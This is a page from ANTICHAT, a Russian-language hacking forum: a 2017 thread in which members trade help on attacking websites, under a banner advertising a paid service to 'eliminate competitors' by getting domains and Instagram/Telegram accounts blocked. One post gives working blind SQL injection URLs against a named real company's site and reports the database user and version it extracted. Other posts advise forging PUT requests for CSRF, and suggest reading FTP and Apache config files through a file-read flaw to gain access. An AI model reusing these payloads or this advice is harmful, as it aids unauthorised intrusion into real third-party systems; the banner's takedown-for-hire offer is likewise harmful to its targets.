УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 171 из 296

171

Опции темы

Поиск в этой теме

Опции просмотра

#1701

05.02.2017, 19:07

[aywo]

Познающий

Регистрация: 01.02.2007

Сообщений: 89

Провел на форуме:
1668307

Репутация: 114

Отправить сообщение для [aywo] с помощью ICQ

Цитата:

Сообщение от Octavian

Octavian said:
↑
В скулмап ктото засунет . интересно что он скажет

слепая скуля, потому вывода нет.

Код:

Code:
http://iucosoft.com/software-development-details.html?place=desktop%27%20AND%20substring(user(),8,1)=%27t

Код:

Code:
http://iucosoft.com/software-development-details.html?place=desktop%27%20AND%20substring(version(),7,1)=%27-

user() = iucosoft

version() = 5.5.40-(дальше не докрутил) в ручную подбирал с телефона

#1702

05.02.2017, 20:15

crlf

Guest

Сообщений: n/a

Провел на форуме:
169212

Репутация: 441

Цитата:

Сообщение от Elva

Elva said:
↑
Задача
Подделать PUT запрос с целью проведения CSRF атаки.

Токен скорее всего проверяется, но всякое бывает. Для отправки PUT можно воспользоваться Burp-ом, для проведения атаки XMLHttpRequest.

Цитата:

Сообщение от Elva

Elva said:
↑
2. Кто может помочь включить BeEF ?

Попробуй подробно написать на гитхабе https://github.com/beefproject/beef/issues, возможно помогут.

#1703

06.02.2017, 16:14

Nikolaz

Guest

Сообщений: n/a

Провел на форуме:
0

Репутация: -5

Что можно сделать с локальной читалкой в гете при условии что конфиг к бд php формата и прочитать его соответственно не получается? Можно что то такое прочитать, что помогло бы получить доступ?

#1704

06.02.2017, 17:32

crlf

Guest

Сообщений: n/a

Провел на форуме:
169212

Репутация: 441

Цитата:

Сообщение от Nikolaz

Nikolaz said:
↑
Что можно сделать с локальной читалкой в гете при условии что конфиг к бд php формата и прочитать его соответственно не получается? Можно что то такое прочитать, что помогло бы получить доступ?

Может у тебя локальный инклуд?

#1705

06.02.2017, 19:38

Nikolaz

Guest

Сообщений: n/a

Провел на форуме:
0

Репутация: -5

Цитата:

Сообщение от crlf

crlf said:
↑
Может у тебя локальный инклуд?

У меня file_get_contents() а не include() . Читать ток могу

#1706

06.02.2017, 19:53

t0ma5

Guest

Сообщений: n/a

Провел на форуме:
300820

Репутация: 90

Цитата:

Сообщение от Nikolaz

Nikolaz said:
↑
У меня file_get_contents() а не include() . Читать ток могу

тогда php файлы должны читаться, может прав не хватать, index.php например читается?

#1707

06.02.2017, 20:15

Nikolaz

Guest

Сообщений: n/a

Провел на форуме:
0

Репутация: -5

Цитата:

Сообщение от t0ma5

t0ma5 said:
↑
тогда php файлы должны читаться, может прав не хватать, index.php например читается?

Благодарю, не знал. Но прав не хватает... Нужны еще варианты помимо конфига от бд. Можно системное что нибудь прочитать что позволит получить доступ? Ссх клиент там, и прочую лабуду

#1708

06.02.2017, 20:23

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

Цитата:

Сообщение от Nikolaz

Nikolaz said:
↑
Благодарю, не знал. Но прав не хватает... Нужны еще варианты помимо конфига от бд. Можно системное что нибудь прочитать что позволит получить доступ? Ссх клиент там, и прочую лабуду

ну для ssh пассы в открытом виде еще со времен мамонтов не было, попробуй файлы конфигов фтп, апача